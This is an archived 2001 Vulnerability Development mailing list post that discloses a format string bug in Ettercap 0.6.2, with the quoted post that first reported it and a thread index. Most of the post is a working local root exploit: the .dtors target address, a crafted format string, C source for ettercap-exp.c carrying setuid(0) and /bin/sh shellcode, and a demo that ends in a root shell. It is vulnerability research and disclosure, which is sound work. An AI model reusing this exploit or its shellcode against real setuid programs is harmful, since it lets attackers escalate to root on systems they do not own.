Vulnerability Development mailing list archives
Proof of concept for the format bug in Ettercap 0.6.2
From: BAILLEUX Christophe <cb () t-online fr>
Date: Wed, 5 Dec 2001 12:25:00 +0100 (CET)
Firstly, let's retrieve the address of the section .dtors: cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap /usr/local/sbin/ettercap: file format elf32-i386 Contents of section .dtors: 8119a70 ffffffff 00000000 ........ cb@tshaw$ So the fmt string is composed of: - "000" for allignment. - "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we expect to write (here .dtors + 4 -- 0x8119a74.) - "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode. This format string was built using fmtbuilder: http://minimum.inria.fr/~raynal/index.php3?page=501 ---- ettercap-exp.c ---- #include <stdio.h> #include <stdlib.h> int main() { char buf[1024]; char shellcode[] = /* setuid(0) */ "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* Aleph 1 shellcode */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn"; memset(buf, 0x90, 1024); memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode)); setenv("SHELLCODE", buf, 1); execl("/usr/local/sbin/ettercap", "ettercap", fmt, 0x0); } ---- ettercap-exp.c ---- Demo: This demo is made with a suid root version. cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c cb@tshaw$ ./ettercap-exp ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA... may the packets be with you... Invalid host address 000tv00000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000 ....snip.... 0000000000000000000000000000000000000000000000081020c0 !! sh-2.04# id uid=0(root) groups=100(users) Best regards, -- Christophe Bailleux - Network & System Security Engineer Club-Internet / T-Online France Voice:+33-(0)1-5545-4789 - mailto:cb () t-online fr On Tue, 4 Dec 2001, Blue Boar wrote:
Goobles sent another post to vuln-dev today, which was rejected due to personal attacks in their note. I want to check out their claim, however. If you want to see their original posting, it's on their web site like the others, I'm sure. It includes a claimed exploit, which cannot be posted due to their wishes that it not be separated from the advisory. If someone wants to write an independent exploit, I'd be happy to post that, provided it follows the list rules, of course. Here's the basic problem: ettercap %x%x%x%x%x%x%x ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA... may the packets be with you... Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !! Gobbles' point is that there is an option to configure it suid, so this could be exploitable when that is used. Why someone would want a packet capture program to be used by non-priv users.. Well, I'm sure there's a good reason somewhere in the world. Is anyone using it that way? Are there OS distributions that come with Ettercap installed by default? And, of course, is it suid? (I can't imagine it would be.) The workaround is obvious, don't run it suid or allow remote users who do not already have a shell to execute it with a command-line parameter (such as via a web interface.) BB
Current thread:
- Potential hole in Ettercap 0.6.2 Blue Boar (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Michal Zalewski (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Blue Boar (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Jonathan Bloomquist (Dec 04)
- Proof of concept for the format bug in Ettercap 0.6.2 BAILLEUX Christophe (Dec 05)
- <Possible follow-ups>
- Re:Potential hole in Ettercap 0.6.2 w1re p4ir (Dec 04)
- Re:Potential hole in Ettercap 0.6.2 ALoR (Dec 04)
- Re:Potential hole in Ettercap 0.6.2 Jose Nazario (Dec 04)
- Message not available
- Re:Potential hole in Ettercap 0.6.2 ALoR (Dec 04)
- Re:Potential hole in Ettercap 0.6.2 ALoR (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Michal Zalewski (Dec 04)
- Re: Potential hole in Ettercap 0.6.2 Melsa (Dec 04)